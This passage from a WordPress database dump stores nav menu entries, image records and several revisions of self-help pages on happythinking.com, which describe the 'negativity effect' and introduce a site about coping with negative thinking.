(1678, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1678', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1678', 16, 'nav_menu_item', '', 0),
(1680, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1680', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1680', 15, 'nav_menu_item', '', 0),
(1681, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1681', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1681', 13, 'nav_menu_item', '', 0),
(1682, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1682', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1682', 10, 'nav_menu_item', '', 0),
(1683, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1683', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1683', 3, 'nav_menu_item', '', 0),
(1684, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1684', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1684', 7, 'nav_menu_item', '', 0),
(1685, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1685', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1685', 4, 'nav_menu_item', '', 0),
(1686, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1686', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1686', 11, 'nav_menu_item', '', 0),
(1687, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1687', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1687', 9, 'nav_menu_item', '', 0),
(1688, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', ' ', '', '', 'publish', 'closed', 'closed', '', '1688', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1688', 12, 'nav_menu_item', '', 0),
(1690, 1, '2023-08-08 15:21:43', '2023-05-30 19:07:39', '', 'Tools', '', 'publish', 'closed', 'closed', '', 'tools', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/?p=1690', 8, 'nav_menu_item', '', 0),
(1830, 1, '2023-06-15 06:44:09', '2023-06-15 06:44:09', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus almost fully on the lost mobile phone, while ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking is negative because it makes the situation worse than it needs to be, as when one minimises positive events, they donâ€™t help to reduce the emotional impact of negative events. A more â€œhelpfulâ€ way to think would have been to see both the negative and positive events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a lion''s tail. If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a lion''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst lions and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the negativity effect type of negative thinking pattern.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-15 06:44:09', '2023-06-15 06:44:09', '', 1616, 'https://www.happythinking.com/?p=1830', 0, 'revision', '', 0),
(1828, 1, '2023-06-15 06:37:54', '2023-06-15 06:37:54', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1803,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/am_i_happy_100623.jpg" alt="" class="wp-image-1803"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1826,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron160623a.jpg" alt="" class="wp-image-1826"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-15 06:37:54', '2023-06-15 06:37:54', '', 1034, 'https://www.happythinking.com/?p=1828', 0, 'revision', '', 0),
(1832, 1, '2023-06-15 06:46:22', '2023-06-15 06:46:22', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>[seesaw image]</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the negative and positive events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a lion''s tail. If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a lion''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst lions and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the negativity effect type of negative thinking pattern.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-15 06:46:22', '2023-06-15 06:46:22', '', 1616, 'https://www.happythinking.com/?p=1832', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1834, 1, '2023-06-15 07:07:01', '2023-06-15 07:07:01', '', 'unbalanced_160623', '', 'inherit', '', 'closed', '', 'unbalanced_160623', '', '', '2023-06-15 07:07:01', '2023-06-15 07:07:01', '', 1616, 'https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1835, 1, '2023-06-15 07:08:59', '2023-06-15 07:08:59', '', 'balanced_160623', '', 'inherit', '', 'closed', '', 'balanced_160623', '', '', '2023-06-15 07:08:59', '2023-06-15 07:08:59', '', 1616, 'https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1839, 1, '2023-06-15 12:58:27', '2023-06-15 12:58:27', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Psychologists call this type of thinking, where one gives more importance to negative events when compared to positive events, the â€œnegativity effectâ€. The â€œnegativity effectâ€ type of negative thinking is very common and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a tiger''s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a tiger''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst tigers and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the â€œnegativity effectâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-15 12:58:27', '2023-06-15 12:58:27', '', 1616, 'https://www.happythinking.com/?p=1839', 0, 'revision', '', 0),
(1838, 1, '2023-06-15 12:57:32', '2023-06-15 12:57:32', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Psychologists call this type of thinking, where one gives more importance to negative events when compared to positive events, the â€œnegativity effectâ€. The â€œnegativity effectâ€ type of negative thinking is very common and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a tiger''s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class="wp-block-separator has-alpha-channel-opacity"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a tiger''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst tigers and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class="wp-block-separator has-alpha-channel-opacity"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the â€œnegativity effectâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button 